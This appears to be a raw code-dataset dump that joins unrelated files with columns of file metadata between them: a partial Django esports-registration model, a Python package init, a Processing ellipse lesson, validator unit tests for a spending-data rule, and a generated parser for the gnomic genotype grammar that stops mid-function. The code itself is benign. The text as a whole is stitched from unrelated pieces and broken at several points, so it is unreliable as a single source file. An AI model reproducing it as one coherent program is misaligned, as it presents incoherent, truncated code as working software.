DAYS_CHOICES = (
('1', 'One'),
('2', 'Two'),
('3', 'Three'),
('4', 'Four'),
)
STATE_CHOICES = (
('1', 'Andhra Pradesh'),
('2', 'Arunachal Pradesh'),
('3', 'Assam'),
('4', 'Bihar'),
('5', 'Chhattisgarh'),
('6', 'Goa'),
('7', 'Gujarat'),
('8', 'Haryana'),
('9', 'Himachal Pradesh'),
('10', 'Jammu & Kashmir'),
('11', 'Jharkhand'),
('12', 'Karnataka'),
('13', 'Kerala'),
('14', 'Madhya Pradesh'),
('15', 'Maharashtra'),
('16', 'Manipur'),
('17', 'Meghalaya'),
('18', 'Mizoram'),
('19', 'Nagaland'),
('20', 'Odisha'),
('21', 'Punjab'),
('22', 'Rajasthan'),
('23', 'Sikkim'),
('24', 'Tamil Nadu'),
('25', 'Telangana'),
('26', 'Tripura'),
('27', 'Uttarakhand'),
('28', 'Uttar Pradesh'),
('29', 'West Bengal'),
('30', 'Andaman & Nicobar Islands'),
('31', 'Delhi'),
('32', 'Chandigarh'),
('33', 'Dadra & Naagar Haveli'),
('34', 'Daman & Diu'),
('35', 'Lakshadweep'),
('36', 'Puducherry'),
)
ESPORT_CHOICES = (
('1', 'Valorant'),
('2', 'BGMI'),
('3', 'Chess')
)
user = models.OneToOneField(User, on_delete=models.CASCADE)
phone = models.CharField(max_length=11)
gender = models.CharField(max_length=1, choices=GENDER_CHOICES, default='M')
college = models.CharField(max_length=128)
state = models.CharField(max_length=2, choices=STATE_CHOICES)
amount_required = models.PositiveSmallIntegerField(default=0, blank=True)
amount_paid = models.PositiveSmallIntegerField(default=0, blank=True)
no_of_days = models.CharField(max_length=1, choices=DAYS_CHOICES, blank=True, null=True)
id_issued = models.BooleanField(default=False)
qr_code = models.ImageField(upload_to='qr_code', blank=True, null=True)
teamId = models.ForeignKey("registration.EsportsTeamRegistration", on_delete=models.SET_NULL, null=True, related_name="member")
user_type= models.CharField(max_length=1, default='E')
team_member2 = models.CharField(max_length=128, blank=True, null=True)
team_member3 = models.CharField(max_length=128, blank=True, null=True)
team_member4 = models.CharField(max_length=128, blank=True, null=True)
team_member5 = models.CharField(max_length=128, blank=True, null=True)
team_member6 = models.CharField(max_length=128, blank=True, null=True)
captain_ingame_id = models.CharField(max_length=128, blank=True, null=True)
captain_rank= models.CharField(max_length=128, blank=True, null=True)
team_member2_ingame_id = models.CharField(max_length=128, blank=True, null=True)
team_member3_ingame_id = models.CharField(max_length=128, blank=True, null=True)
team_member4_ingame_id = models.CharField(max_length=128, blank=True, null=True)
team_member5_ingame_id = models.CharField(max_length=128, blank=True, null=True)
team_member6_ingame_id = models.CharField(max_length=128, blank=True, null=True)
team_member2_name = models.CharField(max_length=128, blank=True, null=True)
team_member3_name = models.CharField(max_length=128, blank=True, null=True)
team_member4_name = models.CharField(max_length=128, blank=True, null=True)
team_member5_name = models.CharField(max_length=128, blank=True, null=True)
team_member6_name = models.CharField(max_length=128, blank=True, null=True)
team_member2_rank = models.CharField(max_length=128, blank=True, null=True)
team_member3_rank = models.CharField(max_length=128, blank=True, null=True)
team_member4_rank = models.CharField(max_length=128, blank=True, null=True)
team_member5_rank = models.CharField(max_length=128, blank=True, null=True)
team_member6_rank = models.CharField(max_length=128, blank=True, null=True)
def __str__(self):
return self.user.username
| 39.583333
| 131
| 0.597895
| 755
| 6,650
| 5.096689
| 0.22649
| 0.136435
| 0.163721
| 0.218295
| 0.91762
| 0.91762
| 0.909304
| 0.873961
| 0.873961
| 0.873961
| 0
| 0.047868
| 0.22406
| 6,650
| 167
| 132
| 39.820359
| 0.697868
| 0
| 0
| 0.703704
| 0
| 0
| 0.157143
| 0.009774
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012346
| false
| 0
| 0.012346
| 0.012346
| 0.388889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e1a19bcbf874d4fd41c3c72d21c560ff65bfb221
| 178
|
py
|
Python
|
indicators/tests/form_tests/__init__.py
|
mercycorps/toladata
|
4d5f9b45905a81af9981b586690e020d5b3bfc60
|
[
"Apache-2.0"
] | null | null | null |
indicators/tests/form_tests/__init__.py
|
mercycorps/toladata
|
4d5f9b45905a81af9981b586690e020d5b3bfc60
|
[
"Apache-2.0"
] | 268
|
2020-03-31T15:46:59.000Z
|
2022-03-31T18:01:08.000Z
|
indicators/tests/form_tests/__init__.py
|
mercycorps/toladata
|
4d5f9b45905a81af9981b586690e020d5b3bfc60
|
[
"Apache-2.0"
] | 1
|
2021-01-05T01:58:24.000Z
|
2021-01-05T01:58:24.000Z
|
from .result_form_unittests import *
from .indicator_form_disaggregations_unittests import *
from .indicator_custom_fields import *
from .disaggregated_value_result_form import *
| 44.5
| 55
| 0.870787
| 22
| 178
| 6.590909
| 0.5
| 0.206897
| 0.262069
| 0.386207
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08427
| 178
| 4
| 56
| 44.5
| 0.889571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
36139e8c19bd94567df85feaa409c88702953be8
| 460
|
pyde
|
Python
|
lesson_1_2/lesson_1_2.pyde
|
wewearglasses/intro-to-python-with-processing
|
05c672c6d796da53f5cada2f029d24f72d6b008f
|
[
"MIT"
] | null | null | null |
lesson_1_2/lesson_1_2.pyde
|
wewearglasses/intro-to-python-with-processing
|
05c672c6d796da53f5cada2f029d24f72d6b008f
|
[
"MIT"
] | null | null | null |
lesson_1_2/lesson_1_2.pyde
|
wewearglasses/intro-to-python-with-processing
|
05c672c6d796da53f5cada2f029d24f72d6b008f
|
[
"MIT"
] | null | null | null |
# Variables
center_x=50
center_y=50
diameter=10
ellipse(center_x,center_y,diameter,diameter)
# Variables allow us to make changes on them
# Let's make some changes on the variables
diameter=diameter+2
center_x=center_x+diameter
ellipse(center_x,center_y,diameter,diameter)
diameter=diameter+2
center_x=center_x+diameter
ellipse(center_x,center_y,diameter,diameter)
diameter=diameter+2
center_x=center_x+diameter
ellipse(center_x,center_y,diameter,diameter)
| 23
| 44
| 0.83913
| 77
| 460
| 4.805195
| 0.25974
| 0.208108
| 0.245946
| 0.216216
| 0.716216
| 0.716216
| 0.716216
| 0.616216
| 0.616216
| 0.616216
| 0
| 0.021176
| 0.076087
| 460
| 20
| 45
| 23
| 0.849412
| 0.202174
| 0
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
36caf26bdf39e3514df2d323023625b523f5d3b0
| 3,968
|
py
|
Python
|
tests/unit/dataactvalidator/test_a35_cross_file.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | 1
|
2019-06-22T21:53:16.000Z
|
2019-06-22T21:53:16.000Z
|
tests/unit/dataactvalidator/test_a35_cross_file.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | null | null | null |
tests/unit/dataactvalidator/test_a35_cross_file.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | null | null | null |
from tests.unit.dataactcore.factories.domain import TASFactory
from tests.unit.dataactcore.factories.staging import AppropriationFactory, ObjectClassProgramActivityFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'a35_cross_file'
_TAS = 'a35_cross_file_tas'
def test_column_headers(database):
expected_subset = {'row_number', 'deobligations_recoveries_r_cpe', 'ussgl487100_downward_adjus_cpe_sum',
'ussgl497100_downward_adjus_cpe_sum', 'ussgl487200_downward_adjus_cpe_sum',
'ussgl497200_downward_adjus_cpe_sum'}
actual = set(query_columns(_FILE, database))
assert (actual & expected_subset) == expected_subset
def test_success(database):
""" Tests that, for entries with the matching TAS, Appropriations
deobligations_recoveries_r_cpe equals the sum of all corresponding entries
for Object Class Program Acitivity fields ussgl487100_downward_adjus_cpe,
ussgl497100_downward_adjus_cpe, ussgl487200_downward_adjus_cpe,
ussgl497200_downward_adjus_cpe"""
tas = TASFactory()
database.session.add(tas)
database.session.flush()
ap = AppropriationFactory(tas_id=tas.tas_id, deobligations_recoveries_r_cpe=8)
# Contributes 4
op_1 = ObjectClassProgramActivityFactory(
tas_id=tas.tas_id, ussgl487100_downward_adjus_cpe=1, ussgl497100_downward_adjus_cpe=1,
ussgl487200_downward_adjus_cpe=1, ussgl497200_downward_adjus_cpe=1)
# Contributes another 4
op_2 = ObjectClassProgramActivityFactory(
tas_id=tas.tas_id, ussgl487100_downward_adjus_cpe=1, ussgl497100_downward_adjus_cpe=1,
ussgl487200_downward_adjus_cpe=1, ussgl497200_downward_adjus_cpe=1)
assert number_of_errors(_FILE, database, models=[ap, op_1, op_2]) == 0
def test_success_scenario2(database):
tas1 = TASFactory()
tas2 = TASFactory()
database.session.add_all([tas1, tas2])
database.session.flush()
ap = AppropriationFactory(tas_id=tas1.tas_id, deobligations_recoveries_r_cpe=8)
# Contributes 4
op_1 = ObjectClassProgramActivityFactory(
tas_id=tas1.tas_id, ussgl487100_downward_adjus_cpe=1, ussgl497100_downward_adjus_cpe=1,
ussgl487200_downward_adjus_cpe=1, ussgl497200_downward_adjus_cpe=1)
# Contributes another 4
op_2 = ObjectClassProgramActivityFactory(
tas_id=tas1.tas_id, ussgl487100_downward_adjus_cpe=1, ussgl497100_downward_adjus_cpe=1,
ussgl487200_downward_adjus_cpe=1, ussgl497200_downward_adjus_cpe=1)
# Doesn't contribute, different TAS
op_3 = ObjectClassProgramActivityFactory(
tas_id=tas2.tas_id, ussgl487100_downward_adjus_cpe=1, ussgl497100_downward_adjus_cpe=1,
ussgl487200_downward_adjus_cpe=1, ussgl497200_downward_adjus_cpe=1)
assert number_of_errors(_FILE, database, models=[ap, op_1, op_2, op_3]) == 0
def test_failure(database):
""" Tests that, for entries with the matching TAS, Appropriations
deobligations_recoveries_r_cpe does not equals the sum of all
corresponding entries for Object Class Program Acitivity fields
ussgl487100_downward_adjus_cpe, ussgl497100_downward_adjus_cpe,
ussgl487200_downward_adjus_cpe, ussgl497200_downward_adjus_cpe"""
tas = TASFactory()
database.session.add(tas)
database.session.flush()
ap = AppropriationFactory(tas_id=tas.tas_id, deobligations_recoveries_r_cpe=7)
# Contributes 4
op_1 = ObjectClassProgramActivityFactory(
tas_id=tas.tas_id, ussgl487100_downward_adjus_cpe=1, ussgl497100_downward_adjus_cpe=1,
ussgl487200_downward_adjus_cpe=1, ussgl497200_downward_adjus_cpe=1)
# Contributes another 4
op_2 = ObjectClassProgramActivityFactory(
tas_id=tas.tas_id, ussgl487100_downward_adjus_cpe=1, ussgl497100_downward_adjus_cpe=1,
ussgl487200_downward_adjus_cpe=1, ussgl497200_downward_adjus_cpe=1)
assert number_of_errors(_FILE, database, models=[ap, op_1, op_2]) == 1
| 47.238095
| 108
| 0.782006
| 505
| 3,968
| 5.732673
| 0.170297
| 0.17962
| 0.221071
| 0.164421
| 0.77133
| 0.74715
| 0.74715
| 0.730915
| 0.730915
| 0.730915
| 0
| 0.090802
| 0.147933
| 3,968
| 83
| 109
| 47.807229
| 0.765454
| 0.192288
| 0
| 0.509804
| 0
| 0
| 0.065948
| 0.052632
| 0
| 0
| 0
| 0
| 0.078431
| 1
| 0.078431
| false
| 0
| 0.058824
| 0
| 0.137255
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
36d3c39b3398443ed358df2ae710e768d8df8cc9
| 38,127
|
py
|
Python
|
gnomic/grammar.py
|
biosustain/gnomic
|
a6e6bbfdd6b42e888a3d1c361847ae7bb87c766e
|
[
"Apache-2.0"
] | 9
|
2015-07-13T14:15:11.000Z
|
2020-11-20T18:42:08.000Z
|
gnomic/grammar.py
|
biosustain/gnomic
|
a6e6bbfdd6b42e888a3d1c361847ae7bb87c766e
|
[
"Apache-2.0"
] | 33
|
2015-06-19T08:47:19.000Z
|
2017-09-04T11:30:39.000Z
|
gnomic/grammar.py
|
biosustain/gnomic
|
a6e6bbfdd6b42e888a3d1c361847ae7bb87c766e
|
[
"Apache-2.0"
] | 4
|
2015-10-15T19:10:54.000Z
|
2020-01-22T09:53:18.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# CAVEAT UTILITOR
#
# This file was automatically generated by Grako.
#
# https://pypi.python.org/pypi/grako/
#
# Any changes you make to it will be overwritten the next time
# the file is generated.
from __future__ import print_function, division, absolute_import, unicode_literals
from grako.buffering import Buffer
from grako.parsing import graken, Parser
from grako.util import re, RE_FLAGS, generic_main # noqa
__all__ = [
'GnomicParser',
'GnomicSemantics',
'main'
]
KEYWORDS = {}
class GnomicBuffer(Buffer):
def __init__(
self,
text,
whitespace=re.compile('[\\t ]+', RE_FLAGS | re.DOTALL),
nameguard=None,
comments_re=None,
eol_comments_re=None,
ignorecase=None,
namechars='',
**kwargs
):
super(GnomicBuffer, self).__init__(
text,
whitespace=whitespace,
nameguard=nameguard,
comments_re=comments_re,
eol_comments_re=eol_comments_re,
ignorecase=ignorecase,
namechars=namechars,
**kwargs
)
class GnomicParser(Parser):
def __init__(
self,
whitespace=re.compile('[\\t ]+', RE_FLAGS | re.DOTALL),
nameguard=None,
comments_re=None,
eol_comments_re=None,
ignorecase=None,
left_recursion=False,
parseinfo=True,
keywords=None,
namechars='',
buffer_class=GnomicBuffer,
**kwargs
):
if keywords is None:
keywords = KEYWORDS
super(GnomicParser, self).__init__(
whitespace=whitespace,
nameguard=nameguard,
comments_re=comments_re,
eol_comments_re=eol_comments_re,
ignorecase=ignorecase,
left_recursion=left_recursion,
parseinfo=parseinfo,
keywords=keywords,
namechars=namechars,
buffer_class=buffer_class,
**kwargs
)
@graken()
def _SEQUENCE_VARIANT_(self):
with self._choice():
with self._option():
self._DNA_SEQUENCE_VARIANT_()
with self._option():
self._PROTEIN_SEQUENCE_VARIANT_()
self._error('no available options')
@graken()
def _DNA_SEQUENCE_VARIANT_(self):
with self._group():
with self._choice():
with self._option():
self._token('g')
with self._option():
self._token('c')
with self._option():
self._token('n')
self._error('expecting one of: c g n')
self._token('.')
with self._group():
with self._choice():
with self._option():
self._INTEGER_()
self._NUCLEOTIDE_()
self._token('>')
self._NUCLEOTIDE_()
with self._option():
self._INTEGER_()
self._token('+')
self._INTEGER_()
self._NUCLEOTIDE_()
self._token('>')
self._NUCLEOTIDE_()
with self._option():
self._token('[')
self._INTEGER_()
self._NUCLEOTIDE_()
self._token('>')
self._NUCLEOTIDE_()
self._token(';')
self._INTEGER_()
self._NUCLEOTIDE_()
self._token('>')
self._NUCLEOTIDE_()
self._token(']')
with self._option():
self._INTEGER_()
with self._group():
with self._choice():
with self._option():
self._token('=//')
with self._option():
self._token('=/')
self._error('expecting one of: =/ =//')
self._NUCLEOTIDE_()
self._token('>')
self._NUCLEOTIDE_()
with self._option():
self._INTEGER_()
self._token('=')
with self._option():
self._INTEGER_()
self._token('+')
self._INTEGER_()
self._token('del')
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
with self._group():
with self._choice():
with self._option():
self._token('del=//del')
with self._option():
self._token('=/del')
self._error('expecting one of: =/del del=//del')
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('ins')
with self._group():
with self._choice():
with self._option():
self._NUCLEOTIDE_SEQUENCE_()
with self._option():
self._token('(')
self._INTEGER_()
self._token(')')
self._error('no available options')
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('ins')
self._pattern(r'\w')
self._INTEGER_()
self._token('.')
self._INTEGER_()
self._token(':')
self._INTEGER_()
self._token('_')
self._INTEGER_()
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('ins')
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('inv')
with self._optional():
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('inv')
with self._option():
self._token('(')
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token(')ins')
self._NUCLEOTIDE_()
self._token('(')
self._PROTEIN_SEQUENCE_VARIANT_()
self._token(')')
with self._option():
self._token('(')
self._INTEGER_()
self._token('+')
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('-')
self._INTEGER_()
self._token(')_(')
self._INTEGER_()
self._token('+')
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('-')
self._INTEGER_()
self._token(')')
with self._group():
with self._choice():
with self._option():
self._token('dup')
with self._option():
self._token('[')
self._INTEGER_()
self._token(']')
self._error('expecting one of: dup')
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('con')
self._INTEGER_()
self._token('_')
self._INTEGER_()
with self._option():
self._INTEGER_()
self._token('delins')
self._NUCLEOTIDE_SEQUENCE_()
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('delins')
self._NUCLEOTIDE_SEQUENCE_()
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('[')
self._INTEGER_()
self._token(']')
with self._optional():
self._token(';[')
self._INTEGER_()
self._token(']')
with self._option():
self._token('-')
self._INTEGER_()
self._token('_-')
self._INTEGER_()
self._token('[')
with self._group():
with self._choice():
with self._option():
self._token('(')
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token(')')
with self._option():
self._INTEGER_()
self._error('no available options')
self._token(']')
with self._option():
self._INTEGER_()
self._pattern(r'([ACGTBDHKMNRSVWY]{3}\[\d+\])+')
with self._option():
self._INTEGER_()
self._token('-')
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('-')
self._INTEGER_()
self._DEL_DUP_()
with self._option():
self._INTEGER_()
self._DEL_DUP_()
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
with self._group():
with self._choice():
with self._option():
self._DEL_DUP_()
with self._option():
self._token('inv')
self._error('expecting one of: inv')
with self._option():
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('+')
self._INTEGER_()
self._DEL_DUP_()
with self._option():
self._token('(?_-')
self._INTEGER_()
self._token(')_(*')
self._INTEGER_()
self._token('_?)')
self._DEL_DUP_()
with self._option():
self._token('(?_-')
self._INTEGER_()
self._token(')_(')
self._INTEGER_()
self._token('+')
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token('-')
self._INTEGER_()
self._token(')')
self._DEL_DUP_()
self._error('no available options')
@graken()
def _DEL_DUP_(self):
with self._group():
with self._choice():
with self._option():
self._token('del')
with self._option():
self._token('dup')
self._error('expecting one of: del dup')
@graken()
def _NUCLEOTIDE_(self):
self._pattern(r'[ACGTBDHKMNRSVWY]')
@graken()
def _NUCLEOTIDE_SEQUENCE_(self):
def block0():
self._NUCLEOTIDE_()
self._positive_closure(block0)
@graken()
def _PROTEIN_SEQUENCE_VARIANT_(self):
self._token('p.')
with self._group():
with self._choice():
with self._option():
with self._group():
with self._choice():
with self._option():
self._AMINO_ACID_()
with self._option():
self._token('*')
self._error('expecting one of: *')
self._INTEGER_()
with self._optional():
self._AMINO_ACID_SEQUENCE_()
self._token('ext')
with self._group():
with self._choice():
with self._option():
with self._group():
with self._choice():
with self._option():
self._token('-')
with self._option():
self._token('*')
self._error('expecting one of: * -')
self._INTEGER_()
with self._option():
self._token('*?')
with self._option():
self._token('*')
self._error('expecting one of: * *?')
with self._option():
self._token('(')
self._AMINO_ACID_()
self._INTEGER_()
self._AMINO_ACID_()
self._token('ext')
self._AMINO_ACID_SEQUENCE_()
self._token(')')
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._AMINO_ACID_()
self._token('fs')
self._AMINO_ACID_()
self._INTEGER_()
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._token('fs')
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._AMINO_ACID_()
self._token('fs*')
with self._group():
with self._choice():
with self._option():
self._INTEGER_()
with self._option():
self._token('?')
self._error('expecting one of: ?')
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._token('delins')
self._AMINO_ACID_SEQUENCE_()
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._token('_')
self._AMINO_ACID_()
self._INTEGER_()
with self._group():
with self._choice():
with self._option():
self._token('ins')
with self._option():
self._token('delins')
self._error('expecting one of: delins ins')
with self._group():
with self._choice():
with self._option():
self._AMINO_ACID_SEQUENCE_()
with self._option():
self._INTEGER_()
self._error('no available options')
with self._option():
self._token('(')
self._AMINO_ACID_()
self._INTEGER_()
self._token('_')
self._AMINO_ACID_()
self._INTEGER_()
with self._group():
with self._choice():
with self._option():
self._token('ins')
with self._option():
self._token('delins')
self._error('expecting one of: delins ins')
with self._group():
with self._choice():
with self._option():
self._AMINO_ACID_SEQUENCE_()
with self._option():
self._INTEGER_()
self._error('no available options')
self._token(')')
with self._option():
self._token('[')
self._AMINO_ACID_()
self._INTEGER_()
self._AMINO_ACID_()
self._token(';')
self._AMINO_ACID_()
self._INTEGER_()
self._AMINO_ACID_()
self._token(']')
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._AMINO_ACID_()
with self._option():
self._token('(')
self._AMINO_ACID_()
self._INTEGER_()
with self._group():
with self._choice():
with self._option():
self._token('*')
with self._option():
self._token('Ter')
with self._option():
self._token('=')
with self._option():
self._token('?')
with self._option():
self._AMINO_ACID_()
self._error('expecting one of: * = ? Ter')
self._token(')')
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
with self._group():
with self._choice():
with self._option():
self._token('*')
with self._option():
self._token('Ter')
with self._option():
self._token('=')
with self._option():
self._token('?')
with self._option():
self._AMINO_ACID_()
self._error('expecting one of: * = ? Ter')
with self._option():
self._token('0')
with self._option():
self._token('?')
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._DEL_DUP_()
with self._option():
self._token('(')
self._AMINO_ACID_()
self._INTEGER_()
self._DEL_DUP_()
self._token(')')
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._token('_')
self._AMINO_ACID_()
self._INTEGER_()
self._DEL_DUP_()
with self._option():
self._AMINO_ACID_()
self._INTEGER_()
self._token('[')
self._INTEGER_()
self._token(']')
with self._optional():
self._token(';[')
self._INTEGER_()
self._token(']')
with self._option():
self._token('(')
self._AMINO_ACID_()
self._INTEGER_()
self._token(')[(')
self._INTEGER_()
self._token('_')
self._INTEGER_()
self._token(')]')
self._error('expecting one of: 0 ?')
@graken()
def _AMINO_ACID_(self):
self._pattern(r'[A-Z]([a-z]{2})?')
@graken()
def _AMINO_ACID_SEQUENCE_(self):
def block0():
self._AMINO_ACID_()
self._positive_closure(block0)
@graken()
def _VARIABLE_VARIANT_(self):
self._VARIABLE_VARIANT_IDENTIFIER_()
self._token('=')
self._VARIABLE_VARIANT_VALUE_()
@graken()
def _VARIABLE_VARIANT_IDENTIFIER_(self):
self._pattern(r'[a-z0-9][a-zA-Z0-9]*(\.[a-z0-9][a-zA-Z0-9]*)*')
@graken()
def _VARIABLE_VARIANT_VALUE_(self):
with self._choice():
with self._option():
self._NUMBER_()
with self._option():
self._QUOTED_STRING_()
with self._option():
self._UNQUOTED_STRING_()
self._error('no available options')
@graken()
def _NUMBER_(self):
self._pattern(r'[-+]?[0-9]*\.?[0-9]+([eE][-+]?[0-9]+)?')
@graken()
def _QUOTED_STRING_(self):
self._pattern(r'"(?:[^"\\]|\\.)*"')
@graken()
def _UNQUOTED_STRING_(self):
self._pattern(r'[a-zA-Z0-9]+')
@graken()
def _start_(self):
with self._optional():
self._SEP_()
with self._group():
with self._choice():
with self._option():
self._CHANGE_()
self.add_last_node_to_name('@')
def block1():
self._LIST_SEPARATOR_()
self._CHANGE_()
self.add_last_node_to_name('@')
self._closure(block1)
with self._option():
self._empty_closure()
self._error('no available options')
with self._optional():
self._SEP_()
self._check_eof()
@graken()
def _CHANGE_(self):
with self._choice():
with self._option():
self._INSERTION_()
with self._option():
self._REPLACEMENT_()
with self._option():
self._DELETION_()
with self._option():
self._PLASMID_()
with self._option():
self._PHENE_()
self._error('no available options')
@graken()
def _INSERTION_(self):
self._token('+')
self._ANNOTATION_()
self.name_last_node('after')
self.ast._define(
['after'],
[]
)
@graken()
def _REPLACEMENT_(self):
with self._choice():
with self._option():
with self._group():
with self._choice():
with self._option():
self._ANNOTATION_AT_LOCUS_()
with self._option():
self._ANNOTATION_()
self._error('no available options')
self.name_last_node('before')
self._token('>')
self.name_last_node('op')
with self._group():
with self._choice():
with self._option():
self._PLASMID_()
with self._option():
self._ANNOTATION_()
self._error('no available options')
self.name_last_node('after')
with self._option():
with self._group():
with self._choice():
with self._option():
self._ANNOTATION_AT_LOCUS_()
with self._option():
self._ANNOTATION_()
self._error('no available options')
self.name_last_node('before')
self._token('>>')
self.name_last_node('op')
with self._group():
with self._choice():
with self._option():
self._PLASMID_()
with self._option():
self._ANNOTATION_()
self._error('no available options')
self.name_last_node('after')
self._error('no available options')
self.ast._define(
['after', 'before', 'op'],
[]
)
@graken()
def _DELETION_(self):
self._token('-')
with self._group():
with self._choice():
with self._option():
self._PLASMID_()
with self._option():
self._ANNOTATION_AT_LOCUS_()
with self._option():
self._ANNOTATION_()
self._error('no available options')
self.name_last_node('before')
self.ast._define(
['before'],
[]
)
@graken()
def _PLASMID_(self):
with self._choice():
with self._option():
self._token('(')
self._IDENTIFIER_()
self.name_last_node('name')
self._SEP_()
self._ANNOTATIONS_()
self.name_last_node('annotations')
self._token(')')
with self._option():
self._token('(')
self._IDENTIFIER_()
self.name_last_node('name')
self._token(')')
self._error('no available options')
self.ast._define(
['annotations', 'name'],
[]
)
@graken()
def _ANNOTATION_AT_LOCUS_(self):
self._ANNOTATION_()
self.name_last_node('annotation')
self._token('@')
self._FEATURE_()
self.name_last_node('locus')
self.ast._define(
['annotation', 'locus'],
[]
)
@graken()
def _ANNOTATION_(self):
with self._choice():
with self._option():
self._FUSION_()
with self._option():
self._FEATURE_()
with self._option():
self._COMPOSITE_ANNOTATION_()
self._error('no available options')
@graken()
def _ANNOTATIONS_(self):
with self._optional():
self._SEP_()
with self._group():
with self._choice():
with self._option():
self._FEATURE_FUSION_()
with self._option():
self._FEATURE_()
self._error('no available options')
self.add_last_node_to_name('@')
def block2():
self._LIST_SEPARATOR_()
with self._group():
with self._choice():
with self._option():
self._FEATURE_FUSION_()
with self._option():
self._FEATURE_()
self._error('no available options')
self.add_last_node_to_name('@')
self._closure(block2)
with self._optional():
self._SEP_()
@graken()
def _COMPOSITE_ANNOTATION_(self):
self._token('{')
self._ANNOTATIONS_()
self.name_last_node('@')
self._token('}')
@graken()
def _FUSION_(self):
with self._group():
with self._choice():
with self._option():
self._COMPOSITE_ANNOTATION_()
with self._option():
self._FEATURE_()
self._error('no available options')
self.add_last_node_to_name('@')
def block2():
self._token(':')
with self._group():
with self._choice():
with self._option():
self._COMPOSITE_ANNOTATION_()
with self._option():
self._FEATURE_()
self._error('no available options')
self.add_last_node_to_name('@')
self._positive_closure(block2)
@graken()
def _FEATURE_FUSION_(self):
self._FEATURE_()
self.add_last_node_to_name('@')
def block1():
self._token(':')
self._FEATURE_()
self.add_last_node_to_name('@')
self._positive_closure(block1)
@graken()
def _FEATURE_(self):
with self._choice():
with self._option():
with self._optional():
self._FEATURE_ORGANISM_()
self.name_last_node('organism')
with self._optional():
self._IDENTIFIER_()
self.name_last_node('type')
self._token('.')
self._IDENTIFIER_()
self.name_last_node('name')
with self._optional():
self._ACCESSION_()
self.name_last_node('accession')
with self._optional():
self._FEATURE_VARIANT_()
self.name_last_node('variant')
with self._option():
self._ACCESSION_()
self.name_last_node('accession')
with self._optional():
self._FEATURE_VARIANT_()
self.name_last_node('variant')
self._error('no available options')
self.ast._define(
['accession', 'name', 'organism', 'type', 'variant'],
[]
)
@graken()
def _PHENE_(self):
with self._choice():
with self._option():
with self._optional():
self._FEATURE_ORGANISM_()
self.name_last_node('organism')
with self._optional():
self._IDENTIFIER_()
self.name_last_node('type')
self._token('.')
self._IDENTIFIER_()
self.name_last_node('name')
with self._optional():
self._ACCESSION_()
self.name_last_node('accession')
self._FEATURE_VARIANT_()
self.name_last_node('variant')
with self._option():
self._ACCESSION_()
self.name_last_node('accession')
self._FEATURE_VARIANT_()
self.name_last_node('variant')
self._error('no available options')
self.ast._define(
['accession', 'name', 'organism', 'type', 'variant'],
[]
)
@graken()
def _FEATURE_ORGANISM_(self):
self._ORGANISM_IDENTIFIER_()
self.name_last_node('@')
self._token('/')
@graken()
def _ORGANISM_IDENTIFIER_(self):
